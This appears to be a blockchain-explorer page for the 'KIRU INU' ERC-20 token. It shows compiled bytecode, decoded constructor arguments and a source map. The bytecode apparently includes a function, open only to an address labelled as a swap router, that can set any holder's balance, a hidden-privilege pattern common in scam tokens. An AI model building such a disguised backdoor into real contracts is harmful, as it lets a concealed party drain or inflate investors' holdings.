038d16845290915290205491906108d4565b600061031533848461074e565b6000546001600160a01b031633146105b85760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610413565b6001600160a01b03811661061d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610413565b61062681610913565b50565b6001600160a01b03831661068b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610413565b6001600160a01b0382166106ec5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610413565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107b25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610413565b6001600160a01b0382166108145760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610413565b61085181604051806060016040528060268152602001610c40602691396001600160a01b03861660009081526001602052604090205491906108d4565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108809082610900565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107419085815260200190565b600081848411156108f85760405162461bcd60e51b81526004016104139190610963565b505050900390565b600061090c8284610c2c565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561099057858101830151858201604001528201610974565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109c857600080fd5b919050565b600080604083850312156109e057600080fd5b6109e9836109b1565b946020939093013593505050565b600080600060608486031215610a0c57600080fd5b610a15846109b1565b9250610a23602085016109b1565b9150604084013590509250925092565b600080600080600060a08688031215610a4b57600080fd5b610a54866109b1565b945060208601358015158114610a6957600080fd5b94979496505050506040830135926060810135926080909101359150565b600060208284031215610a9957600080fd5b61090c826109b1565b60008060408385031215610ab557600080fd5b610abe836109b1565b9150610acc602084016109b1565b90509250929050565b600181811c90821680610ae957607f821691505b602082108103610b0957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610b60578160001904821115610b4657610b46610b0f565b80851615610b5357918102915b93841c9390800290610b2a565b509250929050565b600082610b7757506001610319565b81610b8457506000610319565b8160018114610b9a5760028114610ba457610bc0565b6001915050610319565b60ff841115610bb557610bb5610b0f565b50506001821b610319565b5060208310610133831016604e8410600b8410161715610be3575081810a610319565b610bed8383610b25565b8060001904821115610c0157610c01610b0f565b029392505050565b600061090c8383610b68565b808202811582820484141761031957610319610b0f565b8082018082111561031957610319610b0f56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122023d2d47379a752197cb22eb96681ee9d07bccf028a926010db257d6e6eca7c7764736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000d2eeec44240d0c5707fa58c1269267b36aaeb83a0000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000000000084b49525520494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044b49525500000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): KIRU INU
Arg [1] : symbol_ (string): KIRU
Arg [2] : decimals_ (uint8): 9
Arg [3] : JellySwapRouter (address): 0xd2EEEc44240D0C5707Fa58C1269267b36AAeb83a
Arg [4] : totalSupply_ (uint256): 1000000000000000000

-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 000000000000000000000000d2eeec44240d0c5707fa58c1269267b36aaeb83a
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [6] : 4b49525520494e55000000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [8] : 4b49525500000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

14167:5831:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14996:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16115:210;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;16115:210:0;1004:187:1;15297:108:0;15385:12;;15297:108;;;1342:25:1;;;1330:2;1315:18;15297:108:0;1196:177:1;16333:454:0;;;;;;:::i;:::-;;:::i;15198:91::-;15272:9;;15198:91;;15272:9;;;;1853:36:1;;1841:2;1826:18;15198:91:0;1711:184:1;16795:300:0;;;;;;:::i;:::-;;:::i;19002:366::-;;;;;;:::i;:::-;;:::i;:::-;;15413:180;;;;;;:::i;:::-;-1:-1:-1;;;;;15564:21:0;15532:7;15564:21;;;:12;:21;;;;;;;15413:180;5807:94;;;:::i;5156:87::-;5202:7;5229:6;5156:87;;-1:-1:-1;;;;;5229:6:0;;;2795:51:1;;2783:2;2768:18;5156:87:0;2649:203:1;15095:95:0;;;:::i;17103:400::-;;;;;;:::i;:::-;;:::i;15682:216::-;;;;;;:::i;:::-;;:::i;15906:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;16072:18:0;;;16040:7;16072:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15906:201;6056:192;;;;;;:::i;:::-;;:::i;14256:35::-;;14290:1;14256:35;;14996:91;15041:13;15074:5;15067:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14996:91;:::o;16115:210::-;16234:4;16256:39;3950:10;16279:7;16288:6;16256:8;:39::i;:::-;-1:-1:-1;16313:4:0;16115:210;;;;;:::o;16333:454::-;16473:4;16490:36;16500:6;16508:9;16519:6;16490:9;:36::i;:::-;16537:220;16560:6;3950:10;16608:138;16664:6;16608:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16608:19:0;;;;;;:11;:19;;;;;;;;3950:10;16608:33;;;;;;;;;;:37;:138::i;:::-;16537:8;:220::i;:::-;-1:-1:-1;16775:4:0;16333:454;;;;;:::o;16795:300::-;3950:10;16910:4;17004:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17004:34:0;;;;;;;;;;16910:4;;16932:133;;16982:7;;17004:50;;17043:10;17004:38;:50::i;19002:366::-;15632:15;;-1:-1:-1;;;;;15632:15:0;3950:10;15632:31;15624:40;;;;;;-1:-1:-1;;;;;19202:21:0;::::1;19194:43;;;::::0;-1:-1:-1;;;19194:43:0;;3709:2:1;19194:43:0::1;::::0;::::1;3691:21:1::0;3748:1;3728:18;;;3721:29;-1:-1:-1;;;3766:18:1;;;3759:39;3815:18;;19194:43:0::1;;;;;;;;;19280:28;19292:16:::0;19280:8;:28:::1;:::i;:::-;19272:36;::::0;:5;:36:::1;:::i;:::-;-1:-1:-1::0;;;;;19248:21:0;::::1;;::::0;;;:12:::1;:21;::::0;;;;;:60;;;;19324:36;;::::1;::::0;::::1;::::0;19354:5;1342:25:1;;1330:2;1315:18;;1196:177;19324:36:0::1;;;;;;;;19002:366:::0;;;;;:::o;5807:94::-;5202:7;5229:6;-1:-1:-1;;;;;5229:6:0;3950:10;5376:23;5368:68;;;;-1:-1:-1;;;5368:68:0;;5725:2:1;5368:68:0;;;5707:21:1;;;5744:18;;;5737:30;5803:34;5783:18;;;5776:62;5855:18;;5368:68:0;5523:356:1;5368:68:0;5872:21:::1;5890:1;5872:9;:21::i;:::-;5807:94::o:0;15095:95::-;15142:13;15175:7;15168:14;;;;;:::i;17103:400::-;17223:4;17245:228;3950:10;17295:7;17317:145;17374:15;17317:145;;;;;;;;;;;;;;;;;3950:10;17317:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;17317:34:0;;;;;;;;;;;;:38;:145::i;15682:216::-;15804:4;15826:42;3950:10;15850:9;15861:6;15826:9;:42::i;6056:192::-;5202:7;5229:6;-1:-1:-1;;;;;5229:6:0;3950:10;5376:23;5368:68;;;;-1:-1:-1;;;5368:68:0;;5725:2:1;5368:68:0;;;5707:21:1;;;5744:18;;;5737:30;5803:34;5783:18;;;5776:62;5855:18;;5368:68:0;5523:356:1;5368:68:0;-1:-1:-1;;;;;6145:22:0;::::1;6137:73;;;::::0;-1:-1:-1;;;6137:73:0;;6086:2:1;6137:73:0::1;::::0;::::1;6068:21:1::0;6125:2;6105:18;;;6098:30;6164:34;6144:18;;;6137:62;-1:-1:-1;;;6215:18:1;;;6208:36;6261:19;;6137:73:0::1;5884:402:1::0;6137:73:0::1;6221:19;6231:8;6221:9;:19::i;:::-;6056:192:::0;:::o;19376:380::-;-1:-1:-1;;;;;19512:19:0;;19504:68;;;;-1:-1:-1;;;19504:68:0;;6493:2:1;19504:68:0;;;6475:21:1;6532:2;6512:18;;;6505:30;6571:34;6551:18;;;6544:62;-1:-1:-1;;;6622:18:1;;;6615:34;6666:19;;19504:68:0;6291:400:1;19504:68:0;-1:-1:-1;;;;;19591:21:0;;19583:68;;;;-1:-1:-1;;;19583:68:0;;6898:2:1;19583:68:0;;;6880:21:1;6937:2;6917:18;;;6910:30;6976:34;6956:18;;;6949:62;-1:-1:-1;;;7027:18:1;;;7020:32;7069:19;;19583:68:0;6696:398:1;19583:68:0;-1:-1:-1;;;;;19664:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19716:32;;1342:25:1;;;19716:32:0;;1315:18:1;19716:32:0;;;;;;;;19376:380;;;:::o;17511:622::-;-1:-1:-1;;;;;17651:20:0;;17643:70;;;;-1:-1:-1;;;17643:70:0;;7301:2:1;17643:70:0;;;7283:21:1;7340:2;7320:18;;;7313:30;7379:34;7359:18;;;7352:62;-1:-1:-1;;;7430:18:1;;;7423:35;7475:19;;17643:70:0;7099:401:1;17643:70:0;-1:-1:-1;;;;;17732:23:0;;17724:71;;;;-1:-1:-1;;;17724:71:0;;7707:2:1;17724:71:0;;;7689:21:1;7746:2;7726:18;;;7719:30;7785:34;7765:18;;;7758:62;-1:-1:-1;;;7836:18:1;;;7829:33;7879:19;;17724:71:0;7505:399:1;17724:71:0;17891:111;17930:6;17891:111;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17891:20:0;;;;;;:12;:20;;;;;;;:111;:24;:111::i;:::-;-1:-1:-1;;;;;17868:20:0;;;;;;;:12;:20;;;;;;:134;;;;18039:23;;;;;;;:35;;18067:6;18039:27;:35::i;:::-;-1:-1:-1;;;;;18013:23:0;;;;;;;:12;:23;;;;;;;:61;;;;18090:35;;;;;;;;;;18118:6;1342:25:1;;1330:2;1315:18;;1196:177;11521:240:0;11641:7;11702:12;11694:6;;;;11686:29;;;;-1:-1:-1;;;11686:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11737:5:0;;;11521:240::o;9242:98::-;9300:7;9327:5;9331:1;9327;:5;:::i;:::-;9320:12;9242:98;-1:-1:-1;;;9242:98:0:o;6256:173::-;6312:16;6331:6;;-1:-1:-1;;;;;6348:17:0;;;-1:-1:-1;;;;;;6348:17:0;;;;;;6381:40;;6331:6;;;;;;;6381:40;;6312:16;6381:40;6301:128;6256:173;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:553::-;1992:6;2000;2008;2016;2024;2077:3;2065:9;2056:7;2052:23;2048:33;2045:53;;;2094:1;2091;2084:12;2045:53;2117:29;2136:9;2117:29;:::i;:::-;2107:39;;2196:2;2185:9;2181:18;2168:32;2243:5;2236:13;2229:21;2222:5;2219:32;2209:60;;2265:1;2262;2255:12;2209:60;1900:553;;2288:5;;-1:-1:-1;;;;2340:2:1;2325:18;;2312:32;;2391:2;2376:18;;2363:32;;2442:3;2427:19;;;2414:33;;-1:-1:-1;1900:553:1:o;2458:186::-;2517:6;2570:2;2558:9;2549:7;2545:23;2541:32;2538:52;;;2586:1;2583;2576:12;2538:52;2609:29;2628:9;2609:29;:::i;2857:260::-;2925:6;2933;2986:2;2974:9;2965:7;2961:23;2957:32;2954:52;;;3002:1;2999;2992:12;2954:52;3025:29;3044:9;3025:29;:::i;:::-;3015:39;;3073:38;3107:2;3096:9;3092:18;3073:38;:::i;:::-;3063:48;;2857:260;;;;;:::o;3122:380::-;3201:1;3197:12;;;;3244;;;3265:61;;3319:4;3311:6;3307:17;3297:27;;3265:61;3372:2;3364:6;3361:14;3341:18;3338:38;3335:161;;3418:10;3413:3;3409:20;3406:1;3399:31;3453:4;3450:1;3443:15;3481:4;3478:1;3471:15;3335:161;;3122:380;;;:::o;3844:127::-;3905:10;3900:3;3896:20;3893:1;3886:31;3936:4;3933:1;3926:15;3960:4;3957:1;3950:15;3976:422;4065:1;4108:5;4065:1;4122:270;4143:7;4133:8;4130:21;4122:270;;;4202:4;4198:1;4194:6;4190:17;4184:4;4181:27;4178:53;;;4211:18;;:::i;:::-;4261:7;4251:8;4247:22;4244:55;;;4281:16;;;;4244:55;4360:22;;;;4320:15;;;;4122:270;;;4126:3;3976:422;;;;;:::o;4403:806::-;4452:5;4482:8;4472:80;;-1:-1:-1;4523:1:1;4537:5;;4472:80;4571:4;4561:76;;-1:-1:-1;4608:1:1;4622:5;;4561:76;4653:4;4671:1;4666:59;;;;4739:1;4734:130;;;;4646:218;;4666:59;4696:1;4687:10;;4710:5;;;4734:130;4771:3;4761:8;4758:17;4755:43;;;4778:18;;:::i;:::-;-1:-1:-1;;4834:1:1;4820:16;;4849:5;;4646:218;;4948:2;4938:8;4935:16;4929:3;4923:4;4920:13;4916:36;4910:2;4900:8;4897:16;4892:2;4886:4;4883:12;4879:35;4876:77;4873:159;;;-1:-1:-1;4985:19:1;;;5017:5;;4873:159;5064:34;5089:8;5083:4;5064:34;:::i;:::-;5134:6;5130:1;5126:6;5122:19;5113:7;5110:32;5107:58;;;5145:18;;:::i;:::-;5183:20;;4403:806;-1:-1:-1;;;4403:806:1:o;5214:131::-;5274:5;5303:36;5330:8;5324:4;5303:36;:::i;5350:168::-;5423:9;;;5454;;5471:15;;;5465:22;;5451:37;5441:71;;5492:18;;:::i;7909:125::-;7974:9;;;7995:10;;;7992:36;;;8008:18;;:::i

Swarm Source

ipfs://23d2d47379a752197cb22eb96681ee9d07bccf028a926010db257d6e6eca7c77
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.